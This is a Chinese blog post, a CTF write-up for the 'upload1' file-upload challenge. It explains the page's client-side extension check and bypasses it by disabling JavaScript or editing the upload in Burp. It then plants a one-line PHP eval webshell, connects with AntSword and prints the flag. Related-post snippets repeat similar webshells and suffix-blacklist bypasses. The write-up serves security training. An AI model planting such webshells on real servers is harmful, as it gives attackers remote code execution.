upload1-攻防世界

已于 2024-03-22 15:00:57 修改
阅读量312 收藏 7
点赞数 4
分类专栏: CTF 文章标签: 安全
于 2024-03-22 14:56:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/szhangliwenya/article/details/136937835
版权

题目

 

右键源代码 




<!Doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<script type="text/javascript">
 

Array.prototype.contains = function (obj) {  
    var i = this.length;  
    while (i--) {  
        if (this[i] === obj) {  
            return true;  
        }  
    }  
    return false;  
}  

function check(){
upfile = document.getElementById("upfile");
submit = document.getElementById("submit");
name = upfile.value;
ext = name.replace(/^.+\./,'');

if(['jpg','png'].contains(ext)){
	submit.disabled = false;
}else{
	submit.disabled = true;

	alert('请选择一张图片文件上传!');
}


}

</script>

</head>
<body>



<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> 
<input  id="upfile" name='upfile' type='file' onchange="check();" /> 

<input type='submit'  id ='submit' value='上传'> 
</form> 



</body>


</html>

这段代码是一个简单的HTML页面,其中包含JavaScript代码,用于检查用户是否选择了一个图片文件(.jpg 或 .png)进行上传。

  1. HTML头部 (<head>):

    • 字符集声明<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 这行代码指定了页面的字符编码为UTF-8,确保页面可以正确显示各种字符。

    • JavaScript代码:

      • 扩展数组原型Array.prototype.contains 是一个自定义方法,用于检查数组中是否包含某个特定的对象。这里,它用于检查文件扩展名是否存在于一个特定的数组中。
      • check 函数: 当文件输入字段 (<input type='file'>) 的值发生变化时,这个函数会被调用。它获取文件的扩展名,并检查这个扩展名是否是 jpg 或 png。如果是,则启用上传按钮;如果不是,则禁用上传按钮并显示一个警告。

  2. HTML主体 (<body>):

    • 表单 (<form>): 表单用于上传文件。它使用 enctype='multipart/form-data' 来确保可以正确地上传文件。
    • 文件输入字段 (<input type='file'>): 用户可以通过这个字段选择文件。当文件被选择后,onchange 事件触发 check 函数。
    • 提交按钮 (<input type='submit'>): 用户点击这个按钮以提交表单。它的初始状态是禁用的(disabled),直到用户选择了一个有效的图片文件。
<!Doctype html> <!-- 声明这是一个HTML5文档,但这里有个小错误,应该是<!DOCTYPE html>,注意大写和空格 -->  
<html> <!-- HTML文档的根元素 -->  
<head> <!-- 定义文档的头部 -->  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!-- 定义文档的字符编码为UTF-8 -->  
  
<script type="text/javascript"> <!-- 嵌入JavaScript代码 -->  
  
// 自定义一个方法到Array的原型上,用于检查数组中是否包含某个元素  
Array.prototype.contains = function (obj) {    
    var i = this.length;  <!-- 获取数组的长度 -->  
    while (i--) {  <!-- 使用while循环逆序遍历数组 -->  
        if (this[i] === obj) {  <!-- 如果找到与给定对象相等的元素 -->  
            return true;  <!-- 返回true,表示数组包含该元素 -->  
        }    
    }    
    return false;  <!-- 如果遍历完整个数组都没找到,返回false -->  
}    
  
// 定义check函数,用于检查上传的文件类型  
function check(){  
    upfile = document.getElementById("upfile"); <!-- 获取文件输入元素的引用 -->  
    submit = document.getElementById("submit"); <!-- 获取提交按钮的引用 -->  
    name = upfile.value; <!-- 获取文件输入元素的值,即文件名 -->  
    ext = name.replace(/^.+\./,''); <!-- 使用正则表达式提取文件名中的扩展名 -->  
  
    // 检查扩展名是否在['jpg','png']数组中  
    if(['jpg','png'].contains(ext)){  
        submit.disabled = false; <!-- 如果扩展名有效,启用提交按钮 -->  
    }else{  
        submit.disabled = true; <!-- 如果扩展名无效,禁用提交按钮 -->  
        alert('请选择一张图片文件上传!'); <!-- 显示警告框提示用户选择正确的文件类型 -->  
    }  
}  
  
</script> <!-- 结束JavaScript代码 -->  
  
</head> <!-- 结束文档头部 -->  
<body> <!-- 文档的主体部分开始 -->  
  
<form enctype='multipart/form-data' id='aa' name='aaa' method='post' action='index.php'> <!-- 定义表单,用于文件上传 -->  
    <input  id="upfile" name='upfile' type='file' onchange="check();" /> <!-- 文件输入元素,选择文件时触发check函数 -->  
    <input type='submit'  id ='submit' value='上传'> <!-- 提交按钮,初始状态是禁用的 -->  
</form> <!-- 结束表单 -->  
  
</body> <!-- 结束文档主体 -->  
</html> <!-- 结束HTML文档 -->

 前端验证直接禁用js

F12设置中

 禁用js

直接上传一句话木马,先来构造木马

<?php eval($_REQUEST['x'])?>

左上角另存为php文件然后上传

然后后得到上传路径

直接蚁剑连接 

 

 

一般会放在网站默认路径www下

 

或者bp抓包把后缀改了也能绕过

cyberpeace{35454b3cd4471de5c676ac0c34b420b7}

20_aw
关注
专栏目录
【网络安全 | CTF】攻防世界 upload1 解题详析
等风来
05-24 4657
该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数,用于判断一个对象是否在数组中,主要应用于判断上传文件的扩展名是否属于指定的图片格式,这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求,如果是图片格式(jpg或png),则启用提交按钮,否则禁用提交按钮并弹出提示消息。若文件上传成功,则在上传路径对应的页面会输出。考察文件上传,具体原理及姿势不再赘述。抓包,修改filename文件后缀为。无Error回显,说明木马上传成功。
upload上传1
08-03
1. 前端检查代码删除,js禁用 3. 黑名单 ,改后缀名 php2,php3等 4. 黑名单很全,添加 .htaccess文件 5. 黑名单中禁用了.htac
upload1
he_stand的博客
10-18 1311
upload1 解题步骤 首先打开burpsuit,然后尝试上传一句话文件,显示必须为图片格式,说明为客户端javascript检测。关闭浏览器的javascript即可。 上传成功,利用菜刀连接成功
攻防世界(高手进阶区)——upload1
知足且坚定,温柔且上进
02-12 1375
前提: 打开页面,知道此题是关于文件上传漏洞的,打开源代码,提示只能上传jpg结尾的图片,于是我通过UltraEdit将一句话木马编辑到一张图片,进行文件上传,虽然页面提示上传成功,但是我用蚁剑连接总是不成功,于是有了后面的操作。。。。。。 经过思索,我发现以上操作在此题没有必要,(其实上面操作可以利用简单的挂黑页操作) 我新建了一个含一句话木马的且后缀为jpg的文档,进行上传,进行抓包: 将...
攻防世界-upload1
qq_60905276的博客
11-25 2733
看来白名单上有png,顺便说一下我现在基本使用script写的木马。所以说有对<?的绕过我可能不知道。 上传.htassecc文件看看。 网页就有对后缀名的过滤我是没想到的。 那只能改包看看。 果然就可以了。 ...
攻防世界】十三 --- upload1 --- 文件上传
qq_43168364的博客
12-25 413
题目 — upload1 一、writeup 这里上传了纯纯的一句话木马文件,快速的回显出了,弹窗 可以判断使用的是前端检测手段,将getshell.php改名为getshell.jpg上传,用bp抓包 上传成功 对应的目录用蚁剑链接即可 得到flag 二、知识点 文件上传 ......
攻防世界CTF题:upload1
Aixwei的博客
04-11 1059
发现这里有个onchange事件,大概写了个前端的文件check,那我们在前端把它删掉再上传文件试试。发现了 disabled属性,我们把它删掉之后上传按键可以点击了,此时点击上传,可以看到上传成功。细看当前页面,发现上传按钮灰掉了,但是上传的文件还保留在前端并没有删除,此时再查看前端代码,最后,通过上传图片类型的木马,再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片,可能是前端验证文件格式,所以先看一下源代码,我们先正常上传一句话木马,被拦截后点击确定,
攻防世界-upload
qq_44065556的博客
09-24 1180
进入场景映入眼帘 需要注册账号 注册好之后,登录跳转页面 突破点应该就在这里了 我们先上传一个php文件 显示不正确的文件扩展名,被拦了 用burp抓包改信息 成功上传 但是没有上传路径 只能上传不能利用 思考(题目给的是upload,给的引导思路 就是上传文件拿flag) 我试着上传jpg,png格式的图片文件 有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...
攻防世界upload1
最新发布
07-28
- *1* [攻防世界-upload1-(详细操作)做题笔记](https://blog.csdn.net/qq_43715020/article/details/125274195)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
攻防世界】十一、upload1
Hi~ 土拨鼠
09-15 511
步骤 打开所给场景,发现可以上传文件,尝试进行上传一句话木马: <?php @eval($_REQUEST['a']); echo "执行成功"; ?> 发现提示只能上传图片,点击确定后发现文件已经选中,但是提交按钮却不能点击: 一看就是通过前端js脚本进行校验了,这样就很简单了,两种方法: 第一种:简单粗暴,直接进入控制台,点击设置,禁用JavaScript 刷新,重新选中一句话木马,发现可以提交 上传成功,发现上传的路径已经显示,进行访问 在这里卡了好久,我一直尝试进行传入参数.
[极客大挑战 2019]Upload 1(文件上传)
热门推荐
weixin_45253573的博客
12-08 1万+
打开环境是一个上传图片的页面。 先上传一句话木马试试,这里格式直接不变,先上传看看。 <?php eval($_POST['b'])?> <?php $_GET['a']($_POST['b'])?> 提示说不是图片,需要抓包改文件格式。将Content-Type里面的格式改为image/jpeg 绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht 前几个php格式的一句话都被b了,比如php3 将文件格式改到phtml可以了,但带<?的一句话
攻防世界 | upload1
weixin_47982238的博客
10-07 267
打开网页后,发现是一个文件上传的网站(其实从名字就能看出来) 看一下源代码,了解网站的上传文件的要求——要求上传图片,且文件后缀名为jpg或者png Array.prototype.contains = function (obj) { var i = this.length; while (i--) { if (this[i] === obj) { return true; } } r
攻防世界web--【upload1】
weixin_53146913的博客
04-18 3000
对于上传文件的识别验证分为,前端和后端。 本题是标准的前端验证,所以我们可以通过bp抓包来实现php文件上传,也可以通过只修改前端的js代码进行欺骗。 虽然二者都很简单,但是第一次做前端验证的题还是想记录一下。 Let's go! 首先上传一个一句马。 之后找到这个上传控制属性:是这个"disabled" 咱们就是直接给他删掉的一个大动作, 我们发现这个alert弹窗消失了,然后我们的上传按键又复活了!! 我们就点击“上传”。 然后我们访问这个文件的网址。 ..
攻防世界WEB进阶之upload1
harry_c的博客
10-03 1万+
攻防世界WEB进阶之upload1一、分析二、实操三、答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一、分析 首先打开场景,上传文件进行抓包操作,发现存在部分js代码。 function check(){ upfile = document.getElementById("upfile"); submit = document.getElement...
攻防世界的里的upload1
一大口木的博客
05-23 623
点击后的页面看一下我的一句话木马。
攻防世界 upload1
m0_56107268的博客
05-07 206
进入先查看源代码 function check(){ upfile = document.getElementById("upfile"); submit = document.getElementById("submit"); name = upfile.value; ext = name.replace(/^.+\./,''); if(['jpg','png'].contains(ext)){ submit.disabled = false; }else{ submit.disable
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值